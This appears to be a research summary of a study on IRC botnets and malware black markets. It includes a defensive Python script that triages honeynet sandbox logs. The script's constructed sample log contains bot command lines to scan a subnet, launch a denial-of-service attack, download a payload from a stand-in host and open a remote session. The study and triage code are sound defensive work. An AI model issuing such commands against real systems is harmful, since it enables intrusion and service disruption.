Examining the Creation, Distribution, and Function of Malware On-Line
The global adoption of the Internet and World Wide Web has engendered the growth of significant threats from computer criminals around the world. Computer crimes are costly, and many appear to be perpetrated by computer hackers in foreign countries, particularly Russia and Eastern Europe. These attackers often use malicious software, or malware, to automate attacks and enable multiple forms of cybercrime. Recently, a great deal of attention has been given to a new form of malware used by computer hackers called bots. This malware essentially takes over an infected computer, allowing it to receive commands remotely. Bots are also bought and sold in virtual markets operating out of Russia. Researchers have, however, only begun to explore the prevalence and origins of this form of malware and its potential as an attack tool. Thus, this study examined the social and technical aspects surrounding the creation, distribution, and use of bots through both a criminological and computer science examination of bots and malware.
Specifically, 13 bots were captured in the wild and analyzed using honeynet technologies to determine their utility and function in a simulated computing environment. The findings suggest that these bots had a significant impact on system functionality by changing system protocols, including adding and removing files. The bots also attempted to connect to command and control IRC servers around the world, though the majority appeared to reside in the United States. Five of the bots were able to connect to a command and control channel and received commands to scan other systems online, participate in Denial of Service Attacks, infect another system, and open communication sessions with other computers.
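The honeynet analysis above reduces to a triage question a defender asks of any sandboxed sample: which command-and-control hosts did it try to reach, which did it actually join, and what kinds of commands did the channel send it? The script below is an added example, not code or data from the study, that answers those questions over a constructed sandbox log mixing outbound connection records with captured IRC protocol lines. The log format, the IRC port list, the keyword-to-class mapping, and every address in it are assumptions made for the example; the four command classes mirror the behaviours the report describes (scanning, denial of service, infecting another host, opening a session with another computer).

```python
"""Triage helper for honeynet sandbox logs of a captured bot (added example).

Parses a constructed, sandbox-style log and reports which C2 servers the
sample tried to reach, which it joined, what classes of command the channel
operator sent, and which outbound connections followed those commands.
The log format, field names and command keywords are assumptions for this
example, not the study's own data or tooling.
"""
import re
from collections import Counter

# Ports conventionally used by IRC servers (assumption; tune to your network).
IRC_PORTS = {6667, 6668, 6669, 6697, 7000}

# Command keyword -> class, mirroring the command types the study observed.
COMMAND_CLASSES = {
    "scan": "scan",
    "ddos": "dos",
    "flood": "dos",
    "download": "infect",
    "update": "infect",
    "open": "session",
    "connect": "session",
}

CONN_RE = re.compile(
    r"^(?P<ts>\S+ \S+) CONNECT (?P<src>[\d.]+):\d+ -> "
    r"(?P<dst>[\d.]+):(?P<port>\d+) (?P<result>OK|FAILED)$"
)
IRC_RE = re.compile(r"^(?P<ts>\S+ \S+) IRC (?P<dir>[<>]) (?P<line>.+)$")
# Trailing parameter of an IRC PRIVMSG: "PRIVMSG <target> :<text>"
PRIVMSG_RE = re.compile(r"PRIVMSG \S+ :(?P<text>.+)$")


def classify_command(text):
    """Map the text of a C2 PRIVMSG to a command class, or None if unknown."""
    words = text.split()
    if not words:
        return None
    # Bot command prefixes such as "." or "!" are stripped before lookup.
    return COMMAND_CLASSES.get(words[0].lstrip(".!").lower())


def triage(log_text):
    """Summarise C2 behaviour seen in a sandbox log as a plain dict."""
    c2_attempted, c2_joined = [], []
    command_counts = Counter()
    unclassified = []
    follow_on = []  # successful non-IRC connections made after joining C2

    for raw in log_text.splitlines():
        m = CONN_RE.match(raw)
        if m:
            dst, port, ok = m["dst"], int(m["port"]), m["result"] == "OK"
            if port in IRC_PORTS:
                c2_attempted.append(dst)
                if ok:
                    c2_joined.append(dst)
            elif ok and c2_joined:
                follow_on.append(f"{dst}:{port}")
            continue
        m = IRC_RE.match(raw)
        # Only server-to-bot ("<") PRIVMSGs are operator commands; the bot's
        # own NICK/JOIN traffic (">") and server PINGs are ignored.
        if m and m["dir"] == "<":
            pm = PRIVMSG_RE.search(m["line"])
            if pm:
                cls = classify_command(pm["text"])
                if cls:
                    command_counts[cls] += 1
                else:
                    unclassified.append(pm["text"])
    return {
        "c2_attempted": c2_attempted,
        "c2_joined": c2_joined,
        "commands": dict(command_counts),
        "unclassified": unclassified,
        "follow_on": follow_on,
    }


# Constructed sample log: one failed and one successful C2 connection,
# four operator commands of different classes, one chatter line, and a
# follow-on connection the bot opened after the "open" command.
SAMPLE_LOG = """\
2007-03-12 10:01:02 CONNECT 10.0.0.5:1034 -> 203.0.113.10:6667 FAILED
2007-03-12 10:01:05 CONNECT 10.0.0.5:1035 -> 198.51.100.7:6667 OK
2007-03-12 10:01:06 IRC > NICK sandbox-7f3a
2007-03-12 10:01:06 IRC > JOIN #c2-chan
2007-03-12 10:01:07 IRC < PING :irc.example
2007-03-12 10:01:09 IRC < :master!op@198.51.100.7 PRIVMSG #c2-chan :.scan 192.0.2.0/24 445
2007-03-12 10:01:30 IRC < :master!op@198.51.100.7 PRIVMSG #c2-chan :.ddos 192.0.2.77 80
2007-03-12 10:02:01 IRC < :master!op@198.51.100.7 PRIVMSG #c2-chan :.download http://203.0.113.55/payload.exe
2007-03-12 10:02:15 IRC < :master!op@198.51.100.7 PRIVMSG #c2-chan :hello bots
2007-03-12 10:02:40 IRC < :master!op@198.51.100.7 PRIVMSG #c2-chan :.open 192.0.2.9 1337
2007-03-12 10:03:00 CONNECT 10.0.0.5:1036 -> 192.0.2.9:1337 OK
"""

if __name__ == "__main__":
    for key, value in triage(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

Two design points matter in practice. Attempted and joined C2 hosts are kept separate because, as the study found, most captured bots never complete a connection, yet the hosts they try to reach are still useful for blocking and for locating where the C2 infrastructure sits. Unclassified PRIVMSG text is retained rather than dropped so an analyst can extend the keyword map when a sample uses a command vocabulary the mapping does not yet cover.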
The creation and sale of bots and malware in the on-line black market were also examined using a sample of 909 threads collected from 10 publicly accessible web-forums in Eastern Europe and Russia. The findings suggest that a service economy has developed around the spread of bots, including distributed denial of service attack providers, spam distribution, and bulletproof web hosting. Malware is also available through these forums, such as trojan horse programs, encryption tools, and iframe malware uploading and downloading services. Credit card and identity documents were also readily available, along with hijacked ICQ numbers.
In order to better understand the social dynamics of this market, the normative orders of this community were explored using grounded theory methodology. The results suggest that three interrelated norms shape the relationships between buyers and sellers: price, customer service, and trust. Price is critical, as the cost of goods affects the likelihood that an individual will be able to compete in the market. Customer service reflects the quality of the products available, discounts for volume purchases, and real-time support for customers. Finally, trust refers to the lack of regulation within the markets, which increases the risk of engaging in a purchase with a vendor. Individuals who demonstrate that they are trustworthy can gain clients, while those who attempt to cheat other actors are publicly derided.
As a whole, this study demonstrates the key role that bots and other malicious software play in the facilitation of cybercrime across the globe. Bots have various uses in the wild and receive commands from IRC channels around the globe. Though malicious software takes some skill to create, the forums examined demonstrate that bot masters profit from their infrastructure by selling access to attack services that enable hackers of any skill level to participate in attacks ranging from Distributed Denial of Service attacks to spam. Thus, there is a significant need to disrupt botnets and the markets that facilitate the distribution of malware and hack tools.